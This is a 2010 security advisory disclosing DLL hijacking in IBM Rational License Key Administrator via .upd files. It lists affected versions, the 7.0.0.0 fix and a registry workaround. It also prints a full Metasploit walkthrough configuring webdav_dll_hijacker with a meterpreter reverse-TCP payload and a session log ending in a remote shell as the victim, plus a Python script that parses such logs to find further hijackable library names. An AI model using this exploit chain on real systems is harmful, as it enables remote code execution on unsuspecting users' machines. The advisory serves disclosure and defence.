Advisory: IBM Rational License Key Administrator - DLL Hijacking [Update: 30.08.2010]
- in a nutshell:
---------------------------------------------
IBM Rational License Key Administrator - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- IBM Rational License Key Administrator Description
The IBM Rational® License Key Administrator (LKAD) is installed with many IBM Rational products and with your IBM Rational License Server software. This application provides an interface to IBM Rational Common Licensing (powered by FLEXlm software). Use the LKAD or the LKAD wizard to enter or import license keys and change your license configuration.
- Insecure Library Loading Allows Remote Code Execution
When a .upd file is opened with the License Key Administrator, the application tries to load IBFS32.DLL from the directory the .upd file was opened from (the current working directory) rather than from a fully qualified path. The Windows DLL search order therefore falls through to that directory, so an attacker who places a .upd file together with a malicious IBFS32.DLL on a WebDAV or SMB share and gets a user to open the file obtains code execution with that user's privileges (the session log below shows the target fetching /documents/IBFS32.DLL from the share).
This vulnerability was discovered using the Metasploit Framework webdav_dll_hijacker module with the following option: "set EXTENSIONS upd"
For more vulnerability details please check the links in the reference section.
- Affected Versions
2002.05.00 (included in AppScan 9) - other releases may also be affected.
Update 30.08.2010: 7.0.0.0 is reported as fixed.
- Solution
At the time of the initial advisory (29.08.2010) it was not known whether fixed releases were available. Update 30.08.2010: updating to 7.0.0.0 or later should fix this issue.
Until the update is applied, the workaround from Microsoft Security Advisory 2269637 (see references) applies: the CWDIllegalInDllSearch registry value under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager removes the current working directory from the DLL search path for WebDAV locations (1), for WebDAV and UNC locations (2) or entirely (0xFFFFFFFF). Do not open .upd files from untrusted WebDAV or SMB shares.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
30.08.2010 - advisory updated with fix information (7.0.0.0)
- Reference
http://www-01.ibm.com/software/rational/
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS upd
EXTENSIONS => upd
msf exploit(webdav_dll_hijacker) > show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  upd              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND /
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents/IBFS32.DLL
[*] 10.8.28.55:49253 PROPFIND => 207 File (/documents/IBFS32.DLL)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49253 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 GET => DLL Payload
[*] 10.8.28.55:49253 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49253 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 6 opened (10.8.28.9:4444 -> 10.8.28.55:49256) at Sun Aug 29 21:24:02 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 6
[*] Starting interaction with 6...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
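The session log above records every name the target resolved against the share: IBFS32.DLL was requested and served (207 File), rundll32.exe was requested but not present (404). When the same module is pointed at another application, those PROPFIND responses are what tell you which library the application loads from the document directory. The following Python script is an added example, not part of the original advisory or of the Metasploit module; it parses log lines in the format printed above and reports each file name the client probed and whether it was served. SAMPLE_LOG is constructed from the lines of the session above.

```python
import re

# Constructed sample: the PROPFIND/GET lines webdav_dll_hijacker prints when the
# target opens the bait .upd file (copied from the session log in this advisory).
SAMPLE_LOG = """\
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents/IBFS32.DLL
[*] 10.8.28.55:49253 PROPFIND => 207 File (/documents/IBFS32.DLL)
[*] 10.8.28.55:49253 GET => DLL Payload
[*] 10.8.28.55:49253 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49253 PROPFIND => 404 (/documents/rundll32.exe)
"""

# Only the response lines carry a status code and the path in parentheses;
# request lines ("PROPFIND /documents") and "GET => DLL Payload" are ignored.
RESPONSE_RE = re.compile(
    r"^\[\*\] (?P<client>\d{1,3}(?:\.\d{1,3}){3}):\d+ "
    r"PROPFIND => (?P<status>\d{3}) (?:File |Directory )?\((?P<path>[^)]*)\)$"
)


def probed_files(log):
    """Map each file name the client asked for under the share to the outcome.

    207 means the module served the file, 404 means the client asked for a name
    the module does not provide; any other code is returned verbatim.
    Directory probes (trailing slash or no extension) are skipped.
    """
    results = {}
    for line in log.splitlines():
        m = RESPONSE_RE.match(line.strip())
        if not m:
            continue
        name = m.group("path").rsplit("/", 1)[-1]
        if not name or "." not in name:
            continue
        status = m.group("status")
        outcome = {"207": "served", "404": "missing"}.get(status, status)
        results[name] = outcome
    return results


def hijack_candidates(log):
    """Library and executable names the client resolved relative to the share.

    A 'served' DLL is the one the exploit delivered; a 'missing' name shows a
    further load the application attempts from the document directory.
    """
    return [
        name for name in probed_files(log)
        if name.lower().endswith((".dll", ".exe"))
    ]


def probing_clients(log):
    """Client addresses that issued PROPFIND requests (one entry per target)."""
    clients = []
    for line in log.splitlines():
        m = RESPONSE_RE.match(line.strip())
        if m and m.group("client") not in clients:
            clients.append(m.group("client"))
    return clients


if __name__ == "__main__":
    for client in probing_clients(SAMPLE_LOG):
        print("client:", client)
    for name, outcome in probed_files(SAMPLE_LOG).items():
        print("%-14s %s" % (name, outcome))
```

Run it against a saved msfconsole log instead of SAMPLE_LOG to get the list of names a different application requests; every "missing" entry is a library or binary that the application also resolves from the current working directory and that the module would have to serve under another name.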